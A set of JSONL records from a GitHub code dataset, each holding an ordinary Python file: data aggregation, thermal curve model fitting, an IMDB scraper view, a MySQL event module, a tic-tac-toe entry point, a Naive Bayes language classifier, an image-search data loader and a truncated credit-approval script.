+{"seq_id":"24993026064","text":"import pandas as pd \nimport numpy as np \n\ndef main(dis_num):\n\tdata = {}\n\tfor i in range(1, 26):\n\t\tdata[i] = pd.read_csv('../output_s'+str(i)+'/expt1.2/d'+str(dis_num)+'.csv', error_bad_lines=False)\n\t\tdata[i] = data[i].sort_values(\"Power Divergence\").groupby(\"Lambda\", as_index=False).first()\n\t\tdata[i]['Dataset']=str(i)\n\t\n\tresult = pd.concat(data, ignore_index=True)\n\tresult = result.sort_values('Lambda')\n\tresult.to_csv('d'+str(dis_num)+'_rq4.1.csv')\n\nmain(15)","repo_name":"prasri92/MaxEnt","sub_path":"src/rq4.1.py","file_name":"rq4.1.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69924359930","text":"#!/usr/bin/env python3\n\n\"\"\" This script can 
either output a plot of a given ID or the AIC results of multiple linear \nand non-linear models of temperature performance curves \"\"\"\n\n__appname__ = 'npMod.py'\n__author__ = 'Tristan JC (tjc19@ic.ac.uk)'\n__version__ = '0.0.Godknows'\n\n## imports ##\nimport sys # module to interface our program with the operating system\nfrom lmfit import Minimizer, Parameters, report_fit\nimport numpy as np\nimport scipy.stats\nfrom scipy.stats import linregress\nimport matplotlib.pylab as p\nimport pandas as pd\nimport math\nfrom csv import writer\n\n## constants ##\nk = 8.617e-5\n\n## functions ##\ndef residuals_quad(params, t, data):\n\t\"\"\"Calculate quadratic growth and subtract data\"\"\"\n\t\n\t#Get an ordered dictionary of parameter values\n\tv = params.valuesdict()\n\t\n\t#Quadratic model\n\tmodel = v['a']*t**2 + v['b']*t + v['c']\n\n\treturn model - data #Return residuals\n\ndef residuals_Briere(params, t, data):\n\t'''Fit a Briere model and subtract data'''\n\t#Get an ordered dictionary of parameter values\n\tv = params.valuesdict()\n\n\tmodel = v['B'] * t * (t - v['t0']) * ((v['tm'] - t) ** (1/v['m']))\n\t#Return residuals\n\treturn model - data\n\ndef residuals_school(params, t, data):\n\t'''Fit a Schoolfield model and subtract data'''\n\t#Get an ordered dictionary of parameter values\n\tv = params.valuesdict()\n\n\tmodel = (v['B0'] * np.exp((-v['E']/k) * ((1/t) - (1/283.15))) ) / (1 + np.exp((v['El']/k) * ((1/v['Tl']) - (1/t))) + np.exp((v['Eh']/k) * ((1/v['Th']) - (1/t))))\n\t#Return residuals\n\treturn model - data\n\ndef Define_Parameters(labels, values):\n\t\"\"\"Function for simplifying the process of defining parameters\"\"\"\n\tpar_linear = Parameters()\n\n\tfor i in range(len(labels)):\n\t\t#Add parameters and initial values to it\n\t\tpar_linear.add( labels[i], value = values[i])\n\n\treturn par_linear\n\ndef Starting_vals_school(x, Ran = False):\n\t\"\"\" Find starting values for Schoolfield model parameters \"\"\"\n\tn = len(x)\n\tlin = linregress(x[0:2,1], x[0:2,2])\n\tB0 = abs(lin[0])*283.15 + lin[1]\n\tif B0 < 0 :\n\t\tB0 = 5\n\tEee = np.log(B0) - x[2,2]/(1/((x[2,1])*k) - 1/283.15)\n\n\tmAx = max(x[:,2])\n\tmAxI = np.argmax(x[:,2])\n\tTh = np.mean(x[(np.abs(x[mAxI:,2] - mAx/2)).argmin()])\n\tTl = np.mean(x[(np.abs(x[:mAxI,2] - mAx/2)).argmin()])\n\tEl = -Eee \n\tE = Eee \n\tEh = Eee \n\tif Tl <=0 or Th <= 0 or Eee == 0 :\n\t\tRan = True\n\t\n\tif Ran:\n\t\t#Randomify:\n\t\tB0 = np.random.uniform(0, 20, size = 1)\n\t\tEl = np.random.uniform(-3, 0, size = 1)\n\t\tEh = np.random.uniform(0, 3, size = 1)\n\t\tTl = np.random.uniform(200, 300, size = 1)\n\t\tTh = np.random.uniform(300, 400, size = 1)\n\t\tE = np.random.uniform(-1.5, 1.5, size = 1)\n\t\n\t#Define and output params_school\n\tparams_school = Parameters()\n\tparams_school.add('B0', value = B0, min = -100, max = 100)\n\tparams_school.add('El', value = El, min = -100, max = 0)\n\tparams_school.add('Eh', value = Eh, min = 0, max = 100)\n\tparams_school.add('Tl', value = Tl, min = 0, max = 300)\n\tparams_school.add('Th', value = Th, min = 100, max = 400)\n\tparams_school.add('E', value = E, min = -100, max = 100)\n\treturn params_school\n\ndef Starting_vals_Briere(x, Ran = False):\n\t\"\"\" Find starting values for Briere model parameters \"\"\"\n\t\n\tB = 1\n\ttmin = min(x[:,1])\n\ttmax = max(x[:,1])\n\tt0 = tmin\n\ttm = tmax\n\tm = 2\n\n\tif Ran == True:\n\t\t#Randomify: \n\t\tB = np.random.uniform(-10, 10, size = 1)\n\t\tt0 = np.random.uniform(200, tmin, size = 1) \n\t\ttm = np.random.uniform(tmax, 400, size = 
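# A minimal runnable lmfit fit in the same shape as the residuals_* functions
# above (synthetic data; the true parameter values are made up): Minimizer
# optimises the residual vector and the resulting fit carries the AIC that
# npMod.py later compares across models.
import numpy as np
from lmfit import Minimizer, Parameters

def residuals(params, t, data):
    v = params.valuesdict()
    return v['a'] * t**2 + v['b'] * t + v['c'] - data

t = np.linspace(0.0, 10.0, 50)
data = 1.5 * t**2 - 2.0 * t + 3.0 + np.random.normal(0.0, 0.1, t.size)
params = Parameters()
for name in ('a', 'b', 'c'):
    params.add(name, value=1.0)
fit = Minimizer(residuals, params, fcn_args=(t, data)).minimize(method='leastsq')
print(fit.params['a'].value, fit.aic)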
1)\n\t\tm = np.random.uniform(1, 5, size = 1)\n\t\n\t#Define and outparams_school = Parameters()\n\tparams_school = Parameters()\n\tparams_school.add('B', value = B, min = -100, max = 100)\n\tparams_school.add('t0', value = t0, min = 0, max = tmin)\n\tparams_school.add('tm', value = tm, min = tmax, max = 1000)\n\tparams_school.add('m', value = m, min = 1, max = 10)\n\treturn params_school\n\ndef variance(data):\n\t# Number of observations\n\tn = len(data)\n\t# Mean of the data\n\tmean = sum(data) / n\n\t# Square deviations\n\tdeviations = [(x - mean) ** 2 for x in data]\n\t# Variance\n\tvariance = sum(deviations) / n\n\treturn variance\n\ndef Lin_Mod(Data, ID, plot):\n\t\"\"\" Outputs parameter estimates and AIC for a given model and starting values \"\"\"\n\tType = ['Schoolfield', 'Briere', 'Quadratic']\n\tColour = ['purple', 'green', 'orange']\n\ttmp = Data[Data[:,0]==ID]\n\t# array for AIC scores\n\tScores = np.zeros(6)\n\tescaping = np.zeros(6)\n\tif len(tmp) < 6 :\n\t\tprint('ID: ', ID, ' sample size is: ', len(tmp), ' so skipped')\n\t\treturn escaping\n\t\n\t#Shift data up\n\tshifty = 0\n\tif min(tmp[:,2]) < 0 :\n\t\tshifty = abs(min(tmp[:,2]))\n\t\ttmp[:,2] = tmp[:,2] + shifty\n\t\n\ttmp[:,1] = 273.15+tmp[:,1]\n\tminT = min(tmp[:,1])\n\tmaxT = max(tmp[:,1])\n\n\tfor i in Type :\n\t\t\t\t\t\t\t\n\t\tif i == 'Quadratic':\n\t\t\tcolour = Colour[2]\n\t\t\tresid = residuals_quad \n\t\t\tparams = Define_Parameters(['a','b','c'], [2,2,2])\n\t\t\tj = 3\n\t\t\t\n\t\t\t#create minimzer object\n\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\t\n\t\t\t#Perform the minimization\n\t\t\tbest_mod = minner.minimize(method = 'leastsq')\n\n\t\t\tF = variance(best_mod.residual)/variance(tmp[:,2])\n\t\t\talpha = 0.05\n\t\t\tp_value = scipy.stats.f.cdf(F, len(tmp)-1, len(tmp)-1)\n\t\t\tif p_value > alpha:\n\t\t\t\tprint(\"ID \", ID, \" Not significant\")\n\t\t\t\treturn escaping\n\t\t\tScores[j] = best_mod.aic\n\n\t\tif i == 'Schoolfield':\n\t\t\tcolour = Colour[0]\n\t\t\tresid = residuals_school\n\t\t\tparams = Starting_vals_school(tmp)\n\t\t\tj = 1\n\t\t\t\n\t\t\t#create minimzer object\n\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\n\t\t\t#Perform the minimization\n\t\t\tfit_Mod = minner.minimize(method = 'leastsq')\n\t\t\tbest_mod = fit_Mod\n\t\t\tbest_score = fit_Mod.aic\n\t\t\tScores[j] = fit_Mod.aic\n\n\t\t\tfor l in range(10):\n\t\t\t\ttry:\n\t\t\t\t\tparams = Starting_vals_school(tmp, True)\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t#create minimzer object\n\t\t\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\t\t\n\t\t\t\t\t#Perform the minimization\n\t\t\t\t\tfit_Mod = minner.minimize(method = 'leastsq')\n\t\t\t\t\tif fit_Mod.aic < best_score :\n\t\t\t\t\t\tbest_mod = fit_Mod\n\t\t\t\t\t\tbest_score = fit_Mod.aic\n\t\t\t\t\t\tScores[j] = fit_Mod.aic\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\n\t\t\tF = variance(best_mod.residual)/variance(tmp[:,2])\n\t\t\talpha = 0.05\n\t\t\tp_value = scipy.stats.f.cdf(F, len(tmp)-1, len(tmp)-1)\n\t\t\tif p_value > alpha:\n\t\t\t\tprint(\"ID \", ID, \" Not significant\")\n\t\t\t\treturn escaping\n\t\t\t\n\t\tif i == 'Briere':\n\t\t\tcolour = Colour[1]\n\t\t\tresid = residuals_Briere\n\t\t\tparams = Starting_vals_Briere(tmp)\n\t\t\tj = 2\n\t\t\t\n\t\t\t#create minimzer object\n\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\t\n\t\t\t#Perform the minimization\n\t\t\tfit_Mod = minner.minimize(method = 'leastsq')\n\t\t\tbest_mod = 
fit_Mod\n\t\t\tbest_score = fit_Mod.aic\n\t\t\tScores[j] = fit_Mod.aic\n\t\t\t\n\t\t\tfor l in range(10):\n\t\t\t\ttry:\n\t\t\t\t\t\n\t\t\t\t\tparams = Starting_vals_Briere(tmp, Ran = True)\n\t\t\t\t\t#create minimzer object\n\t\t\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\t\t\n\t\t\t\t\t#Perform the minimization\n\t\t\t\t\tfit_Mod = minner.minimize(method = 'leastsq')\n\t\t\t\t\tif fit_Mod.aic < best_score :\n\t\t\t\t\t\tbest_mod = fit_Mod\n\t\t\t\t\t\tbest_score = fit_Mod.aic\n\t\t\t\t\t\tScores[j] = fit_Mod.aic\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tF = variance(best_mod.residual)/variance(tmp[:,2])\n\t\t\talpha = 0.05\n\t\t\tp_value = scipy.stats.f.cdf(F, len(tmp)-1, len(tmp)-1)\n\t\t\tif p_value > alpha:\n\t\t\t\tprint(\"ID \", ID, \" Not significant\")\n\t\t\t\treturn escaping\n\n\t\tif plot == 'Plot': # Plot this model type\n\t\t\tprint(i)\n\t\t\tprint(report_fit(best_mod))\n\t\t\tresult = tmp[:,2] + best_mod.residual\n\t\t\tt_vec = np.linspace(minT,maxT,1000)\n\t\t\tN_vec = np.ones(len(t_vec))\n\t\t\tresidual_smooth = resid(best_mod.params, t_vec, N_vec)\n\t\t\tpredictedVal = residual_smooth + N_vec\n\t\t\tp.plot(t_vec, (predictedVal - shifty), colour, linestyle = '--', linewidth = 1)\n\tMiNScore = min(Scores[1:4])\n\tScores[1] = np.exp((MiNScore-Scores[1])/2)\n\tScores[2] = np.exp((MiNScore-Scores[2])/2)\n\tScores[3] = np.exp((MiNScore-Scores[3])/2)\n\tScores[0] = ID\n\tScores[4] = maxT - minT\n\tScores[5] = (maxT - minT)/len(tmp)\n\n\tif plot == 'Plot': \n\t\tp.plot(tmp[:,1], (tmp[:,2] - shifty), 'b+')\n\t\tp.legend(fontsize = 10, labels = ['Schoolfield', 'Briere', 'Quadratic', 'Data'])\n\t\tp.xlabel('Temperature (K)', fontsize = 10)\n\t\tp.ylabel('Original Trait Valaue', fontsize = 10)\n\t\tp.ticklabel_format(style='scientific', scilimits=[0,3])\n\t\tp.title('ID :' + str(ID))\n\t\tp.savefig('../Results/plot110.pdf')\n\t\tp.close()\n\treturn(Scores)\n\ndef main(argv):\n\t\"\"\" Build Linear model and prints parameter estimates and AIC \"\"\"\n\t#prep\n\tfields = ['ID', 'ConTemp', 'OriginalTraitValue', 'ConTempMethod']\n\tNum = int(argv[2])\n\t\n\t#read in data\n\tTempRespd = pd.read_csv(argv[1], usecols = fields, dtype={'ID': int, 'ConTemp': float, 'OriginalTraitValue': float, 'ConTempMethod': str}) \n\t\n\tTempResp = TempRespd.drop(columns=['ConTempMethod'])\n\tTempResp = np.array(TempResp, dtype = float)\n\tTempResp[:,[1, 2]] = TempResp[:,[2, 1]]\n\n\t# Option Plot: Best fit for ID given by argv[2]\n\tif argv[3] == 'Plot':\n\t\tLin_Mod(TempResp, Num, argv[3])\n\n\t# Option Stats: Record best AICs for each ID up to ID given by argv[2]\n\tif argv[3] == 'Stats':\n\t\tparas = np.zeros((Num-1, 6))\n\t\tprint('Schoolfield', 'Briere', 'Quadratic', end = '\\n')\n\t\tHabitats = []\n\t\tfor i in range(1, Num):\n\t\t\t# For each ID attempt to fit every model, if this fails move on to next ID\n\t\t\ttry:\n\t\t\t\ttmp = TempRespd.ConTempMethod[TempRespd.ID == i]\n\t\t\t\tHabitats.append(np.unique(tmp)[0])\n\t\t\t\tparas[i-1,:] = Lin_Mod(TempResp, i, argv[3])\n\t\t\t\tif max(paras[i-1, 1:4]) == 1:\n\t\t\t\t\tprint('ID: ', i, ' ', Habitats[i-1], ' ', 'Schoolfield AIC: ', paras[i-1,1], 'Briere AIC: ', paras[i-1,2], 'Quadratic AIC: ', paras[i-1,3], end=\"\\n\")\n\n\t\t\texcept:\n\t\t\t\tpass\n\t\tParas = pd.DataFrame(paras, columns = ['ID', 'Schoolfield', 'Briere', 'Quadratic', 'Range', 'Density'])\n\t\tConTempMethod = pd.Series(Habitats)\n\t\tParas['ConTempMethod'] = ConTempMethod.values\n\t\tParas.to_csv('../Results/res.csv')\n\t\tprint('\\n')\n\nif 
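# The Scores[j] = np.exp((MiNScore - Scores[j]) / 2) lines above compute
# Akaike relative likelihoods, exp((AIC_min - AIC_i) / 2): the best-scoring
# model maps to 1 and worse models decay exponentially. A standalone sketch:
import numpy as np

aics = np.array([100.0, 102.0, 110.0])
rel_likelihood = np.exp((aics.min() - aics) / 2)
print(rel_likelihood)  # [1.0, ~0.368, ~0.0067]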
__name__ == \"__main__\": \n\t\"\"\"Makes sure the \"main\" function is called from command line\"\"\" \n\tstatus = main(sys.argv)\n\tsys.exit(status)","repo_name":"TJCanterbury/CMEECourseWork","sub_path":"CMEEMiniProject/Sandbox/npMod.py","file_name":"npMod.py","file_ext":"py","file_size_in_byte":9853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16879625543","text":"from django.shortcuts import render\nfrom django.views.generic import View\nfrom django.shortcuts import render\n#import urllib\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n# Create your views here.\n\nclass IMDBRating(View):\n\n\tdef get(self,request):\n\t\t\n\n\t\timdb_top_250_url = 'https://www.imdb.com/chart/top/?ref_=nv_mv_250'\n\n\t\t#myURL = urlopen(imdb_top_250_url)\n\t\tr = urlopen(imdb_top_250_url).read()\n\t\tsoup = BeautifulSoup(r,\"html.parser\")\n\t\t#print(myURL.read())\n\t\ttop_250_object = soup.find_all(\"tr\")\n\t\ttop_250_movies_list = []\n\t\tfor row in top_250_object:\n\t\t\t\n\t\t\tif row.find_all('td') :\n\t\t\t\tmovie_name = row.find_all('a')[1].text.encode('utf-8').decode(\"utf-8\") \n\t\t\t\t\n\t\t\t\ttext = row.find_all('strong')[0].get('title', 'No title attribute')\n\t\t\t\ttext = text.replace(' based on ','-',).replace(' user ratings','').split('-')\n\t\t\t\trating = float(text[0])\n\t\t\t\tusers = float(text[1].replace(',',''))\n\t\t\t\ttop_250_movies_list.append([str(movie_name),rating,users])\n\t\treturn render(request,'scatter_plot.html',locals())","repo_name":"sanjay-regulla/Gramener","sub_path":"ScatterPlot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11488389527","text":"import pymysql\nfrom config import Config\n\nconfig = Config()\n\nconn = pymysql.connect(host=config.DB_HOST, user=config.DB_USER, password=config.DB_PASSWORD, db=config.DB_NAME,\n cursorclass=pymysql.cursors.DictCursor)\n\ncur = conn.cursor()\n\n\ndef add_event(userId, communityId, title, date, eventDesc, regURL, eventType, image_path):\n sql = \"INSERT INTO event (userId, communityId, title, edate, eventDesc, regURL, eventType, imgURL) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n conn.ping(reconnect=True)\n cur.execute(sql,(userId, communityId, title, date, eventDesc, regURL, eventType, image_path))\n conn.commit()\n conn.cursor()\n conn.close()\n\n\ndef exist_event(title):\n sql = \"SELECT * FROM event WHERE title = %s\"\n conn.ping(reconnect=True)\n cur.execute(sql,(str(title)))\n result = cur.fetchall()\n conn.commit()\n if (len(result) == 0):\n return False\n else:\n return True\n\n\ndef get_eventList_in_community(community_id):\n sql = \"SELECT * FROM event WHERE communityId = %s \"\n conn.ping(reconnect=True)\n cur.execute(sql,(str(community_id)))\n result = cur.fetchall()\n conn.commit()\n if result:\n return result\n else:\n return []\n\n\ndef get_event_by_id(event_id):\n sql = \"SELECT * from event where id = %s\"\n conn.ping(reconnect=True)\n cur.execute(sql, str(event_id))\n result = cur.fetchone()\n conn.commit()\n if result:\n return result\n else:\n return None\n\n\ndef add_interestedNum(event_id):\n sql = \"UPDATE event SET interestedNum = interestedNum + 1 WHERE id = %s\"\n conn.ping(reconnect=True)\n cur.execute(sql,(str(event_id)))\n conn.commit()\n conn.cursor()\n conn.close()\n\n\ndef delete_interestedNum(event_id):\n sql = \"UPDATE event SET interestedNum = interestedNum - 1 
WHERE id = %s\"\n    conn.ping(reconnect=True)\n    cur.execute(sql,(str(event_id)))\n    conn.commit()\n    conn.cursor()\n    conn.close()","repo_name":"babylink1/CS555","sub_path":"model/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36179167800","text":"from display import DisplayBoard, welcome\n\nfrom input import Interact, PlayGame\n\ninter = Interact()\ndb = DisplayBoard()\nwelcome()\ninter.player_count()\npg = PlayGame(inter)\n\n\nwhile inter.playing:\n    db.print_board(db.position)\n    if inter.playing:\n        inter.get_input()\n    pg.game_over(inter)\n    if not inter.playing:\n        db.print_board(db.position)\n        break\n","repo_name":"FujikoTide/tic-tac-toe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42740483921","text":"import csv\nimport re\nimport math\nimport sys\nimport operator\nimport string\nfrom random import shuffle\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom time import time\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics.pairwise import euclidean_distances\n\n# Load data\ndf_x = pd.read_csv('train_set_x.csv', index_col='Id').values\ndf_y = pd.read_csv('train_set_y.csv', index_col='Id').values\nvalid = pd.read_csv('test_set_x.csv', index_col='Id').values\n\n# Process\ndf_x[pd.isnull(df_x)] = '' #potentially uses tab chars instead\nvalid[pd.isnull(valid)] = ''\ndf = np.concatenate((df_x,df_y), axis=1)\n\nfor i,s in enumerate(df_x):\n    df_x[i][0] = re.sub(r'http\\S*', '', s[0], flags=re.UNICODE)\n    df_x[i][0] = re.sub(r'[0-9]', '', df_x[i][0], flags=re.UNICODE)  # chain on the URL-stripped text; flags must be a keyword, since re.sub's 4th positional argument is count\n    \n# Data Splitting\nx_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=0.2, random_state=14)\nx_test_gen = [[] for i in range(len(x_test))]\nfor i, test_samples in enumerate(x_test):\n    sequence = list(re.sub(r'\\s', '', test_samples[0]))\n    #shuffle(sequence)\n    if len(sequence) > 20:\n        sequence = sequence[:20]\n    sequence = ''.join(sequence)\n    x_test_gen[i] = sequence\nx_test_gen = np.array(x_test_gen)\n\nx_train_gen = [[] for i in range(len(x_train))]\nfor i, test_samples in enumerate(x_train):\n    sequence = list(re.sub(r'\\s', '', test_samples[0]))\n    shuffle(sequence)\n    sequence = ''.join(sequence)\n    x_train_gen[i] = sequence\n    \n# Naive Bayes - Multinomial\npipeline_nb_m = Pipeline([\n    ('vect', CountVectorizer(analyzer='char', lowercase=False)),\n    ('clf', MultinomialNB()),\n])\nparameters_nb_m = {\n    'vect__max_features': (1000, None)\n}\nt_nb_m = time()\ngs_nb = GridSearchCV(pipeline_nb_m,parameters_nb_m, n_jobs=-1)\ngs_nb = gs_nb.fit(x_train_gen,y_train.flatten().tolist())\nprint ('Done %03f' % (time() - t_nb_m))\npred_nb = gs_nb.predict(x_test_gen.flatten().tolist())\nprint ('Naive Bayes %02.02f%%' % (np.mean(pred_nb == y_test.flatten().tolist())*100))\nfor param_name in sorted(parameters_nb_m.keys()):\n    print ('%s: %r' % (param_name, gs_nb.best_params_[param_name]))\n    \n# Saving predictions to an output file for submission to the competition\nfilename = 'io0-predictions-nb.csv'\npredictions = gs_nb.predict(valid.flatten().tolist())\nwith open(filename,'w') as out:\n    
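# The event.py queries above pass values through the second argument of
# cursor.execute(), letting the driver escape them instead of the SQL string
# being built by hand. A sketch of the same pattern (host, credentials and
# table are hypothetical placeholders):
import pymysql

conn = pymysql.connect(host="localhost", user="user", password="secret", db="shop",
                       cursorclass=pymysql.cursors.DictCursor)
with conn.cursor() as cur:
    cur.execute("SELECT * FROM event WHERE id = %s", (42,))
    row = cur.fetchone()
conn.close()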
out.write('Id,Category\\n')\n for i, e in enumerate(predictions):\n out.write(str(i))\n out.write(',')\n out.write(str(e))\n out.write('\\n')","repo_name":"io0/LanguageClassifier","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74872247608","text":"import os\nimport random\nfrom ast import literal_eval\n\nimport numpy as np\nimport pandas as pd\nimport torch as torch\nfrom sklearn_som.som import SOM\n\nfrom gas.settings import PATH_CLIP, PATH_NOUNLIST, PATH_CLASSES, PATH_SELECTION, PATH_ENDS, IMAGES_ON_LINE, \\\n LINES, NUMBER_OF_SEARCHED\n\n\nclass LoaderDatabase:\n \"\"\"\n LoaderDatabase loads the data from a given database.\n\n Attributes:\n path_data (str): The path to the database.\n is_sea_database (bool): A boolean representing whether the database is a sea database or not.\n path_clip (str): The path to folder with preprocessed CLIP data.\n path_nounlist (str): The path to the nounlist.\n path_classes (str): The path to the file with classification of images.\n path_selection (str): The path to the file with indexes of images which should be used for searching.\n path_ends (str): The path to the file with indexes of images which represents ends of each video.\n \"\"\"\n\n def __init__(self, path_data, is_sea_database=False):\n \"\"\"\n Args:\n path_data (str): The path to the database.\n is_sea_database (bool): A boolean representing whether the database is a sea database or not.\n \"\"\"\n self.path_clip = path_data + (\"sea_clip\" if is_sea_database else PATH_CLIP)\n self.path_nounlist = path_data + (\"sea_nounlist.txt\" if is_sea_database else PATH_NOUNLIST)\n self.path_classes = path_data + (\"sea_result.csv\" if is_sea_database else PATH_CLASSES)\n self.path_selection = path_data + (\"sea_selection.txt\" if is_sea_database else PATH_SELECTION)\n self.path_ends = path_data + (\"sea_videos.txt\" if is_sea_database else PATH_ENDS)\n self.is_sea_database = is_sea_database\n self.path_data = path_data\n\n def get_clip_data(self):\n \"\"\"\n Loads the preprocessed data from CLIP.\n\n Returns:\n list: A list of preprocessed data from CLIP.\n\n \"\"\"\n print('loading data...')\n clip_data = []\n\n # preprocessed data from clip\n for fn in sorted(os.listdir(self.path_clip)):\n clip_data.append(torch.load(self.path_clip + f\"/{fn}\"))\n return clip_data\n\n def get_photos_classes(self):\n \"\"\"\n Loads the photo classes.\n\n Returns:\n dict: A dictionary where keys are integers representing image indexes\n and values are lists of indexes representing classes.\n\n \"\"\"\n class_data = pd.read_csv(self.path_classes, sep=';').set_index('id').to_dict()['top']\n return {int(key) - 1: literal_eval(value) for key, value in class_data.items()}\n\n def get_classes(self):\n \"\"\"\n Loads classes (names) and class probabilities.\n\n Returns:\n tuple: A tuple containing two lists. 
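# The Pipeline + GridSearchCV combination used in NaiveBayes.py above, reduced
# to its smallest runnable form on a toy corpus (the texts and labels are
# invented): a character-level CountVectorizer feeding MultinomialNB.
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB

texts = ["bonjour le monde", "hello world", "hola mundo", "hallo welt"] * 5
labels = [0, 1, 2, 3] * 5
pipe = Pipeline([
    ("vect", CountVectorizer(analyzer="char", lowercase=False)),
    ("clf", MultinomialNB()),
])
grid = GridSearchCV(pipe, {"vect__max_features": (50, None)}, cv=2)
grid.fit(texts, labels)
print(grid.best_params_, grid.score(texts, labels))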
The first list contains class names\n and the second list contains the probability of each class.\n\n \"\"\"\n classes = []\n class_pr = {}\n with open(self.path_nounlist, 'r') as f:\n for line in f:\n split = line.split(\":\")\n classes.append(split[0][:-1])\n class_pr[len(classes) - 1] = float(split[1][:-1])\n\n return classes, class_pr\n\n def get_context(self, size_dataset, sur):\n \"\"\"\n Load context of each image from dataset.\n\n Args:\n size_dataset (int): The total number of images in the dataset.\n sur (int): The radius of the context window.\n\n Returns:\n dict: A dictionary where the key is the integer representation of each image\n and the value is a list of integer representation of image within a given radius.\n \"\"\"\n same_video = {}\n if self.path_ends:\n bottom = 0\n with open(self.path_ends, 'r') as f:\n for line in f:\n top = int(line[:-1]) - 1\n same_video.update(\n {i: [max(bottom, i - sur), min(top, i + sur)] for i in range(bottom, top)})\n bottom = top\n else:\n for i in range(size_dataset):\n same_video[i] = [i, i]\n\n return same_video\n\n def set_finding(self, size_dataset):\n \"\"\"\n Generate indexes of images that should be found.\n\n Args:\n size_dataset (int): The total number of images in the dataset.\n\n Returns:\n list: A list of indexes of images that should be found.\n \"\"\"\n # images that should be found\n if self.is_sea_database:\n with open(self.path_selection, 'r') as file:\n sea_finding = [int(num) for num in file.readline().split(',')]\n random.shuffle(sea_finding)\n\n targets = sea_finding[:20] if self.is_sea_database else []\n for i in range(NUMBER_OF_SEARCHED):\n new_int = random.randint(1, size_dataset)\n if new_int not in targets:\n targets.append(new_int)\n\n return targets\n\n @staticmethod\n def load_first_screen(class_data, size_dataset, targets):\n \"\"\"\n Generate the initial set of images indexes using SOM of class labels.\n\n Args:\n class_data (dict): A dictionary containing the class labels for each image. 
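# get_context() above clamps a symmetric +/- sur window to the enclosing
# video's [bottom, top) range; the same clamping logic in isolation:
def context_window(i, bottom, top, sur):
    return [max(bottom, i - sur), min(top, i + sur)]

assert context_window(5, 0, 100, 3) == [2, 8]
assert context_window(1, 0, 100, 3) == [0, 4]      # clamped at the video start
assert context_window(99, 0, 100, 3) == [96, 100]  # clamped at the video end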
(used by SOM)\n            size_dataset (int): The size of the dataset.\n            targets (list): A list of indexes of images that should be found.\n\n        Returns:\n            list: A list of indexes of images representing the first window.\n        \"\"\"\n        # get first window - SOM of labels\n        first_show = [0 for _ in range(IMAGES_ON_LINE * LINES)]\n        input_data = np.array(list(class_data.values()))\n        som = SOM(m=LINES, n=IMAGES_ON_LINE, dim=len(input_data[0]))\n\n        prediction = som.fit_predict(input_data)\n\n        for i in range(len(first_show)):\n            if i in prediction:\n                first_show[i] = np.random.choice(np.where(prediction == i)[0])\n            else:\n                first_show[i] = -1\n\n        for i in range(len(first_show)):\n            if first_show[i] == -1 and len((set(first_show) & set(targets)) - {-1}) < size_dataset:\n                next_id = random.randint(1, size_dataset - 1)\n                while next_id in first_show:\n                    next_id = random.randint(1, size_dataset - 1)\n                first_show[i] = next_id\n\n        return first_show\n","repo_name":"zuzavop/image-searcher","sub_path":"gasearcher/gas/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29331619519","text":"# Credit approval\ningreso = int(input(\" Enter your income in pesos : \"))\nnacimiento = int(input(\" Enter your year of birth :\"))\nhijos = int(input(\" Enter the number of children you have :\"))\nañosbanco = int(input(\" Enter the number of years you have been with the bank :\"))\nestado_c = input(\" Enter your marital status (S/C) :\")\nvivienda = input(\" Enter whether you live in the country or the city (U/R) :\")\n\n\nif (añosbanco >= 10 and hijos >= 2):\n    print(\"APPROVED\")\nelif ((estado_c == \"c\" or estado_c == \"C\") and hijos > 3 and nacimiento >= 1965 and nacimiento <= 1975) :\n    print(\"APPROVED\")\nelif (ingreso >= 2500000 and (estado_c == \"s\" or estado_c == \"S\") and (vivienda == \"u\" or vivienda == \"U\")):\n    print(\"APPROVED\")\nelif (ingreso >= 3500000 and añosbanco > 5):\n    print(\"APPROVED\")\nelif ((vivienda == \"r\" or vivienda == \"R\") and (estado_c == \"C\" or estado_c == \"c\") and hijos < 2):\n    print(\"APPROVED\")\nelse :\n    print(\"NOT 